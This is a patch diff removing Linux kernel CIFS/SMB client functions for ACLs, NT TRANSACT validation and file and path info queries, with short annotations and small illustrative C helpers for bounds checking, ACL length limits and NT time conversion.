+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-			cifsConvertToUTF16((__le16 *) pSMB->FileName, fileName,
+-					   PATH_MAX, nls_codepage, remap);
+-		name_len++;     /* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, fileName);
+-	}
+-	params = 6 + name_len;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find max SMB size from sess */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-	parm_data = ((char *) &pSMB->hdr.Protocol) + offset;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-
+-	/* convert to on the wire format for POSIX ACL */
+-	data_count = ACL_to_cifs_posix(parm_data, local_acl, buflen, acl_type);
+-
+-	if (data_count == 0) {
+-		rc = -EOPNOTSUPP;
+-		goto setACLerrorExit;
+-	}
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_SET_POSIX_ACL);
+-	byte_count = 3 /* pad */  + params + data_count;
+-	pSMB->DataCount = cpu_to_le16(data_count);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc)
+-		cifs_dbg(FYI, "Set POSIX ACL returned %d\n", rc);
+-
+-setACLerrorExit:
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto setAclRetry;
+-	return rc;
+-}
+-
+-int
+-CIFSGetExtAttr(const unsigned int xid, struct cifs_tcon *tcon,
+-	       const int netfid, __u64 *pExtAttrBits, __u64 *pMask)
+-{
+-	int rc = 0;
+-	struct smb_t2_qfi_req *pSMB = NULL;
+-	struct smb_t2_qfi_rsp *pSMBr = NULL;
+-	int bytes_returned;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In GetExtAttr\n");
+-	if (tcon == NULL)
+-		return -ENODEV;
+-
+-GetExtAttrRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2 /* level */ + 2 /* fid */;
+-	pSMB->t2.TotalDataCount = 0;
+-	pSMB->t2.MaxParameterCount = cpu_to_le16(4);
+-	/* BB find exact max data count below from sess structure BB */
+-	pSMB->t2.MaxDataCount = cpu_to_le16(4000);
+-	pSMB->t2.MaxSetupCount = 0;
+-	pSMB->t2.Reserved = 0;
+-	pSMB->t2.Flags = 0;
+-	pSMB->t2.Timeout = 0;
+-	pSMB->t2.Reserved2 = 0;
+-	pSMB->t2.ParameterOffset = cpu_to_le16(offsetof(struct smb_t2_qfi_req,
+-					       Fid) - 4);
+-	pSMB->t2.DataCount = 0;
+-	pSMB->t2.DataOffset = 0;
+-	pSMB->t2.SetupCount = 1;
+-	pSMB->t2.Reserved3 = 0;
+-	pSMB->t2.SubCommand = cpu_to_le16(TRANS2_QUERY_FILE_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->t2.TotalParameterCount = cpu_to_le16(params);
+-	pSMB->t2.ParameterCount = pSMB->t2.TotalParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_ATTR_FLAGS);
+-	pSMB->Pad = 0;
+-	pSMB->Fid = netfid;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->t2.ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "error %d in GetExtAttr\n", rc);
+-	} else {
+-		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-		/* BB also check enough total bytes returned */
+-		if (rc || get_bcc(&pSMBr->hdr) < 2)
+-			/* If rc should we check for EOPNOSUPP and
+-			   disable the srvino flag? or in caller? */
+-			rc = -EIO;      /* bad smb */
+-		else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			__u16 count = le16_to_cpu(pSMBr->t2.DataCount);
+-			struct file_chattr_info *pfinfo;
+-
+-			if (count != 16) {
+-				cifs_dbg(FYI, "Invalid size ret in GetExtAttr\n");
+-				rc = -EIO;
+-				goto GetExtAttrOut;
+-			}
+-			pfinfo = (struct file_chattr_info *)
+-				 (data_offset + (char *) &pSMBr->hdr.Protocol);
+-			*pExtAttrBits = le64_to_cpu(pfinfo->mode);
+-			*pMask = le64_to_cpu(pfinfo->mask);
+-		}
+-	}
+-GetExtAttrOut:
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto GetExtAttrRetry;
+-	return rc;
+-}
+-
+-#endif /* CONFIG_POSIX */
+-
+-/*
+- * Initialize NT TRANSACT SMB into small smb request buffer.  This assumes that
+- * all NT TRANSACTS that we init here have total parm and data under about 400
+- * bytes (to fit in small cifs buffer size), which is the case so far, it
+- * easily fits. NB: Setup words themselves and ByteCount MaxSetupCount (size of
+- * returned setup area) and MaxParameterCount (returned parms size) must be set
+- * by caller
+- */
+-static int
+-smb_init_nttransact(const __u16 sub_command, const int setup_count,
+-		   const int parm_len, struct cifs_tcon *tcon,
+-		   void **ret_buf)
+-{
+-	int rc;
+-	__u32 temp_offset;
+-	struct smb_com_ntransact_req *pSMB;
+-
+-	rc = small_smb_init(SMB_COM_NT_TRANSACT, 19 + setup_count, tcon,
+-				(void **)&pSMB);
+-	if (rc)
+-		return rc;
+-	*ret_buf = (void *)pSMB;
+-	pSMB->Reserved = 0;
+-	pSMB->TotalParameterCount = cpu_to_le32(parm_len);
+-	pSMB->TotalDataCount  = 0;
+-	pSMB->MaxDataCount = cpu_to_le32(CIFSMaxBufSize & 0xFFFFFF00);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->DataCount  = pSMB->TotalDataCount;
+-	temp_offset = offsetof(struct smb_com_ntransact_req, Parms) +
+-			(setup_count * 2) - 4 /* for rfc1001 length itself */;
+-	pSMB->ParameterOffset = cpu_to_le32(temp_offset);
+-	pSMB->DataOffset = cpu_to_le32(temp_offset + parm_len);
+-	pSMB->SetupCount = setup_count; /* no need to le convert byte fields */
+-	pSMB->SubCommand = cpu_to_le16(sub_command);
+-	return 0;
+-}
+-
+-static int
+-validate_ntransact(char *buf, char **ppparm, char **ppdata,
+-		   __u32 *pparmlen, __u32 *pdatalen)
+-{
+-	char *end_of_smb;
+-	__u32 data_count, data_offset, parm_count, parm_offset;
+-	struct smb_com_ntransact_rsp *pSMBr;
+-	u16 bcc;
+-
+-	*pdatalen = 0;
+-	*pparmlen = 0;
+-
+-	if (buf == NULL)
+-		return -EINVAL;
+-
+-	pSMBr = (struct smb_com_ntransact_rsp *)buf;
+-
+-	bcc = get_bcc(&pSMBr->hdr);
+-	end_of_smb = 2 /* sizeof byte count */ + bcc +
+-			(char *)&pSMBr->ByteCount;
+-
+-	data_offset = le32_to_cpu(pSMBr->DataOffset);
+-	data_count = le32_to_cpu(pSMBr->DataCount);
+-	parm_offset = le32_to_cpu(pSMBr->ParameterOffset);
+-	parm_count = le32_to_cpu(pSMBr->ParameterCount);
+-
+-	*ppparm = (char *)&pSMBr->hdr.Protocol + parm_offset;
+-	*ppdata = (char *)&pSMBr->hdr.Protocol + data_offset;
+-
+-	/* should we also check that parm and data areas do not overlap? */
+-	if (*ppparm > end_of_smb) {
+-		cifs_dbg(FYI, "parms start after end of smb\n");
+-		return -EINVAL;
+-	} else if (parm_count + *ppparm > end_of_smb) {
+-		cifs_dbg(FYI, "parm end after end of smb\n");
+-		return -EINVAL;
+-	} else if (*ppdata > end_of_smb) {
+-		cifs_dbg(FYI, "data starts after end of smb\n");
+-		return -EINVAL;
+-	} else if (data_count + *ppdata > end_of_smb) {
+-		cifs_dbg(FYI, "data %p + count %d (%p) past smb end %p start %p\n",
+-			 *ppdata, data_count, (data_count + *ppdata),
+-			 end_of_smb, pSMBr);
+-		return -EINVAL;
+-	} else if (parm_count + data_count > bcc) {
+-		cifs_dbg(FYI, "parm count and data count larger than SMB\n");
+-		return -EINVAL;
+-	}
+-	*pdatalen = data_count;
+-	*pparmlen = parm_count;
+-	return 0;
+-}
+-
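
validate_ntransact() above is a chain of raw pointer comparisons; note that
the "count + pointer > end" form can in principle wrap around if a hostile
count is large enough. The same bounds test restated in an overflow-safe
shape (illustrative only, not code from this patch):

#include <stddef.h>

/* true iff [start, start + count) lies entirely within [start, end) */
static int area_in_bounds(const char *start, size_t count, const char *end)
{
	return start <= end && count <= (size_t)(end - start);
}
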
+-/* Get Security Descriptor (by handle) from remote server for a file or dir */
+-int
+-CIFSSMBGetCIFSACL(const unsigned int xid, struct cifs_tcon *tcon, __u16 fid,
+-		  struct cifs_ntsd **acl_inf, __u32 *pbuflen)
+-{
+-	int rc = 0;
+-	int buf_type = 0;
+-	QUERY_SEC_DESC_REQ *pSMB;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-
+-	cifs_dbg(FYI, "GetCifsACL\n");
+-
+-	*pbuflen = 0;
+-	*acl_inf = NULL;
+-
+-	rc = smb_init_nttransact(NT_TRANSACT_QUERY_SECURITY_DESC, 0,
+-			8 /* parm len */, tcon, (void **) &pSMB);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->MaxParameterCount = cpu_to_le32(4);
+-	/* BB TEST with big acls that might need to be e.g. larger than 16K */
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Fid = fid; /* file handle always le */
+-	pSMB->AclFlags = cpu_to_le32(CIFS_ACL_OWNER | CIFS_ACL_GROUP |
+-				     CIFS_ACL_DACL);
+-	pSMB->ByteCount = cpu_to_le16(11); /* 3 bytes pad + 8 bytes parm */
+-	inc_rfc1001_len(pSMB, 11);
+-	iov[0].iov_base = (char *)pSMB;
+-	iov[0].iov_len = be32_to_cpu(pSMB->hdr.smb_buf_length) + 4;
+-
+-	rc = SendReceive2(xid, tcon->ses, iov, 1 /* num iovec */, &buf_type,
+-			  0, &rsp_iov);
+-	cifs_small_buf_release(pSMB);
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_acl_get);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QuerySecDesc = %d\n", rc);
+-	} else {                /* decode response */
+-		__le32 *parm;
+-		__u32 parm_len;
+-		__u32 acl_len;
+-		struct smb_com_ntransact_rsp *pSMBr;
+-		char *pdata;
+-
+-/* validate_nttransact */
+-		rc = validate_ntransact(rsp_iov.iov_base, (char **)&parm,
+-					&pdata, &parm_len, pbuflen);
+-		if (rc)
+-			goto qsec_out;
+-		pSMBr = (struct smb_com_ntransact_rsp *)rsp_iov.iov_base;
+-
+-		cifs_dbg(FYI, "smb %p parm %p data %p\n",
+-			 pSMBr, parm, *acl_inf);
+-
+-		if (le32_to_cpu(pSMBr->ParameterCount) != 4) {
+-			rc = -EIO;      /* bad smb */
+-			*pbuflen = 0;
+-			goto qsec_out;
+-		}
+-
+-/* BB check that data area is minimum length and as big as acl_len */
+-
+-		acl_len = le32_to_cpu(*parm);
+-		if (acl_len != *pbuflen) {
+-			cifs_dbg(VFS, "acl length %d does not match %d\n",
+-				 acl_len, *pbuflen);
+-			if (*pbuflen > acl_len)
+-				*pbuflen = acl_len;
+-		}
+-
+-		/* check if buffer is big enough for the acl
+-		   header followed by the smallest SID */
+-		if ((*pbuflen < sizeof(struct cifs_ntsd) + 8) ||
+-		    (*pbuflen >= 64 * 1024)) {
+-			cifs_dbg(VFS, "bad acl length %d\n", *pbuflen);
+-			rc = -EINVAL;
+-			*pbuflen = 0;
+-		} else {
+-			*acl_inf = kmemdup(pdata, *pbuflen, GFP_KERNEL);
+-			if (*acl_inf == NULL) {
+-				*pbuflen = 0;
+-				rc = -ENOMEM;
+-			}
+-		}
+-	}
+-qsec_out:
+-	free_rsp_buf(buf_type, rsp_iov.iov_base);
+-	return rc;
+-}
+-
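
The length checks above accept only a narrow window: at least a security
descriptor header plus the smallest possible SID, and strictly below 64K.
Stated on its own; the 28-byte constant is an assumed stand-in for
sizeof(struct cifs_ntsd) + 8, not a value taken from the source:

#define NTSD_HDR_PLUS_MIN_SID 28	/* assumed stand-in, see note above */

static int acl_len_plausible(unsigned int len)
{
	return len >= NTSD_HDR_PLUS_MIN_SID && len < 64 * 1024;
}
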
+-int
+-CIFSSMBSetCIFSACL(const unsigned int xid, struct cifs_tcon *tcon, __u16 fid,
+-			struct cifs_ntsd *pntsd, __u32 acllen, int aclflag)
+-{
+-	__u16 byte_count, param_count, data_count, param_offset, data_offset;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	SET_SEC_DESC_REQ *pSMB = NULL;
+-	void *pSMBr;
+-
+-setCifsAclRetry:
+-	rc = smb_init(SMB_COM_NT_TRANSACT, 19, tcon, (void **) &pSMB, &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-
+-	param_count = 8;
+-	param_offset = offsetof(struct smb_com_transaction_ssec_req, Fid) - 4;
+-	data_count = acllen;
+-	data_offset = param_offset + param_count;
+-	byte_count = 3 /* pad */  + param_count;
+-
+-	pSMB->DataCount = cpu_to_le32(data_count);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->MaxParameterCount = cpu_to_le32(4);
+-	pSMB->MaxDataCount = cpu_to_le32(16384);
+-	pSMB->ParameterCount = cpu_to_le32(param_count);
+-	pSMB->ParameterOffset = cpu_to_le32(param_offset);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->DataOffset = cpu_to_le32(data_offset);
+-	pSMB->SetupCount = 0;
+-	pSMB->SubCommand = cpu_to_le16(NT_TRANSACT_SET_SECURITY_DESC);
+-	pSMB->ByteCount = cpu_to_le16(byte_count+data_count);
+-
+-	pSMB->Fid = fid; /* file handle always le */
+-	pSMB->Reserved2 = 0;
+-	pSMB->AclFlags = cpu_to_le32(aclflag);
+-
+-	if (pntsd && acllen) {
+-		memcpy((char *)pSMBr + offsetof(struct smb_hdr, Protocol) +
+-				data_offset, pntsd, acllen);
+-		inc_rfc1001_len(pSMB, byte_count + data_count);
+-	} else
+-		inc_rfc1001_len(pSMB, byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-
+-	cifs_dbg(FYI, "SetCIFSACL bytes_returned: %d, rc: %d\n",
+-		 bytes_returned, rc);
+-	if (rc)
+-		cifs_dbg(FYI, "Set CIFS ACL returned %d\n", rc);
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto setCifsAclRetry;
+-
+-	return (rc);
+-}
+-
+-
+-/* Legacy Query Path Information call for lookup to old servers such
+-   as Win9x/WinME */
+-int
+-SMBQueryInformation(const unsigned int xid, struct cifs_tcon *tcon,
+-		    const char *search_name, FILE_ALL_INFO *data,
+-		    const struct nls_table *nls_codepage, int remap)
+-{
+-	QUERY_INFORMATION_REQ *pSMB;
+-	QUERY_INFORMATION_RSP *pSMBr;
+-	int rc = 0;
+-	int bytes_returned;
+-	int name_len;
+-
+-	cifs_dbg(FYI, "In SMBQPath path %s\n", search_name);
+-QInfRetry:
+-	rc = smb_init(SMB_COM_QUERY_INFORMATION, 0, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-			cifsConvertToUTF16((__le16 *) pSMB->FileName,
+-					   search_name, PATH_MAX, nls_codepage,
+-					   remap);
+-		name_len++;     /* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, search_name);
+-	}
+-	pSMB->BufferFormat = 0x04;
+-	name_len++; /* account for buffer type byte */
+-	inc_rfc1001_len(pSMB, (__u16)name_len);
+-	pSMB->ByteCount = cpu_to_le16(name_len);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QueryInfo = %d\n", rc);
+-	} else if (data) {
+-		struct timespec64 ts;
+-		__u32 time = le32_to_cpu(pSMBr->last_write_time);
+-
+-		/* decode response */
+-		/* BB FIXME - add time zone adjustment BB */
+-		memset(data, 0, sizeof(FILE_ALL_INFO));
+-		ts.tv_nsec = 0;
+-		ts.tv_sec = time;
+-		/* decode time fields */
+-		data->ChangeTime = cpu_to_le64(cifs_UnixTimeToNT(ts));
+-		data->LastWriteTime = data->ChangeTime;
+-		data->LastAccessTime = 0;
+-		data->AllocationSize =
+-			cpu_to_le64(le32_to_cpu(pSMBr->size));
+-		data->EndOfFile = data->AllocationSize;
+-		data->Attributes =
+-			cpu_to_le32(le16_to_cpu(pSMBr->attr));
+-	} else
+-		rc = -EIO; /* bad buffer passed in */
+-
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto QInfRetry;
+-
+-	return rc;
+-}
+-
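
The decode path above feeds a 32-bit seconds count through
cifs_UnixTimeToNT(), producing NT time: 100-nanosecond ticks since
1601-01-01. A self-contained sketch of that conversion, where the
11644473600-second constant is the gap between the NT and Unix epochs:

#include <stdint.h>
#include <stdio.h>

#define NT_EPOCH_DELTA_100NS ((uint64_t)11644473600ULL * 10000000ULL)

static uint64_t unix_time_to_nt(int64_t sec, long nsec)
{
	return (uint64_t)sec * 10000000ULL + (uint64_t)(nsec / 100) +
	       NT_EPOCH_DELTA_100NS;
}

int main(void)
{
	/* the Unix epoch itself maps to the epoch delta */
	printf("%llu\n", (unsigned long long)unix_time_to_nt(0, 0));
	return 0;
}
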
+-int
+-CIFSSMBQFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		 u16 netfid, FILE_ALL_INFO *pFindData)
+-{
+-	struct smb_t2_qfi_req *pSMB = NULL;
+-	struct smb_t2_qfi_rsp *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned;
+-	__u16 params, byte_count;
+-
+-QFileInfoRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2 /* level */ + 2 /* fid */;
+-	pSMB->t2.TotalDataCount = 0;
+-	pSMB->t2.MaxParameterCount = cpu_to_le16(4);
+-	/* BB find exact max data count below from sess structure BB */
+-	pSMB->t2.MaxDataCount = cpu_to_le16(CIFSMaxBufSize);
+-	pSMB->t2.MaxSetupCount = 0;
+-	pSMB->t2.Reserved = 0;
+-	pSMB->t2.Flags = 0;
+-	pSMB->t2.Timeout = 0;
+-	pSMB->t2.Reserved2 = 0;
+-	pSMB->t2.ParameterOffset = cpu_to_le16(offsetof(struct smb_t2_qfi_req,
+-					       Fid) - 4);
+-	pSMB->t2.DataCount = 0;
+-	pSMB->t2.DataOffset = 0;
+-	pSMB->t2.SetupCount = 1;
+-	pSMB->t2.Reserved3 = 0;
+-	pSMB->t2.SubCommand = cpu_to_le16(TRANS2_QUERY_FILE_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->t2.TotalParameterCount = cpu_to_le16(params);
+-	pSMB->t2.ParameterCount = pSMB->t2.TotalParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_ALL_INFO);
+-	pSMB->Pad = 0;
+-	pSMB->Fid = netfid;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->t2.ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QFileInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc) /* BB add auto retry on EOPNOTSUPP? */
+-			rc = -EIO;
+-		else if (get_bcc(&pSMBr->hdr) < 40)
+-			rc = -EIO;	/* bad smb */
+-		else if (pFindData) {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			memcpy((char *) pFindData,
+-			       (char *) &pSMBr->hdr.Protocol +
+-			       data_offset, sizeof(FILE_ALL_INFO));
+-		} else
+-			rc = -ENOMEM;
+-	}
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto QFileInfoRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBQPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		 const char *search_name, FILE_ALL_INFO *data,
+-		 int legacy /* old style infolevel */,
+-		 const struct nls_table *nls_codepage, int remap)
+-{
+-	/* level 263 SMB_QUERY_FILE_ALL_INFO */
+-	TRANSACTION2_QPI_REQ *pSMB = NULL;
+-	TRANSACTION2_QPI_RSP *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned;
+-	int name_len;
+-	__u16 params, byte_count;
+-
+-	/* cifs_dbg(FYI, "In QPathInfo path %s\n", search_name); */
+-QPathInfoRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, search_name,
+-				       PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, search_name);
+-	}
+-
+-	params = 2 /* level */ + 4 /* reserved */ + name_len /* includes NUL */;
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(4000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-	struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	if (legacy)
+-		pSMB->InformationLevel = cpu_to_le16(SMB_INFO_STANDARD);
+-	else
+-		pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_ALL_INFO);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QPathInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc) /* BB add auto retry on EOPNOTSUPP? */
+-			rc = -EIO;
+-		else if (!legacy && get_bcc(&pSMBr->hdr) < 40)
+-			rc = -EIO;	/* bad smb */
+-		else if (legacy && get_bcc(&pSMBr->hdr) < 24)
+-			rc = -EIO;  /* 24 or 26 expected but we do not read
+-					last field */
+-		else if (data) {
+-			int size;
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-
+-			/*
+-			 * On legacy responses we do not read the last field,
+-			 * EAsize - fortunately, since it varies by subdialect
+-			 * and also differs between Set and Get (two bytes or
+-			 * four, depending), but we don't care here.
+-			 */
+-			if (legacy)
+-				size = sizeof(FILE_INFO_STANDARD);
+-			else
+-				size = sizeof(FILE_ALL_INFO);
+-			memcpy((char *) data, (char *) &pSMBr->hdr.Protocol +
+-			       data_offset, size);
+-		} else
+-			rc = -ENOMEM;
+-	}
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto QPathInfoRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBUnixQFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		 u16 netfid, FILE_UNIX_BASIC_INFO *pFindData)
+-{
+-	struct smb_t2_qfi_req *pSMB = NULL;
+-	struct smb_t2_qfi_rsp *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned;
+-	__u16 params, byte_count;
+-
+-UnixQFileInfoRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2 /* level */ + 2 /* fid */;
+-	pSMB->t2.TotalDataCount = 0;
+-	pSMB->t2.MaxParameterCount = cpu_to_le16(4);
+-	/* BB find exact max data count below from sess structure BB */
+-	pSMB->t2.MaxDataCount = cpu_to_le16(CIFSMaxBufSize);
+-	pSMB->t2.MaxSetupCount = 0;
+-	pSMB->t2.Reserved = 0;
+-	pSMB->t2.Flags = 0;
+-	pSMB->t2.Timeout = 0;
+-	pSMB->t2.Reserved2 = 0;
+-	pSMB->t2.ParameterOffset = cpu_to_le16(offsetof(struct smb_t2_qfi_req,
+-					       Fid) - 4);
+-	pSMB->t2.DataCount = 0;
+-	pSMB->t2.DataOffset = 0;
+-	pSMB->t2.SetupCount = 1;
+-	pSMB->t2.Reserved3 = 0;
+-	pSMB->t2.SubCommand = cpu_to_le16(TRANS2_QUERY_FILE_INFORMATION);
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->t2.TotalParameterCount = cpu_to_le16(params);
+-	pSMB->t2.ParameterCount = pSMB->t2.TotalParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_UNIX_BASIC);
+-	pSMB->Pad = 0;
+-	pSMB->Fid = netfid;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->t2.ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in UnixQFileInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) < sizeof(FILE_UNIX_BASIC_INFO)) {
+-			cifs_dbg(VFS, "Malformed FILE_UNIX_BASIC_INFO response. Unix Extensions can be disabled on mount by specifying the nosfu mount option.\n");
+-			rc = -EIO;	/* bad smb */
+-		} else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			memcpy((char *) pFindData,
+-			       (char *) &pSMBr->hdr.Protocol +
+-			       data_offset,
+-			       sizeof(FILE_UNIX_BASIC_INFO));
+-		}
+-	}
+-
+-	cifs_buf_release(pSMB);
+-	if (rc == -EAGAIN)
+-		goto UnixQFileInfoRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBUnixQPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		     const unsigned char *searchName,
+-		     FILE_UNIX_BASIC_INFO *pFindData,
+-		     const struct nls_table *nls_codepage, int remap)
+-{
+-/* SMB_QUERY_FILE_UNIX_BASIC */
+-	TRANSACTION2_QPI_REQ *pSMB = NULL;
+-	TRANSACTION2_QPI_RSP *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	int name_len;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In QPathInfo (Unix) the path %s\n", searchName);
+-UnixQPathInfoRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, searchName,
+-				       PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, searchName);
+-	}
+-
+-	params = 2 /* level */ + 4 /* reserved */ + name_len /* includes NUL */;
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(4000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
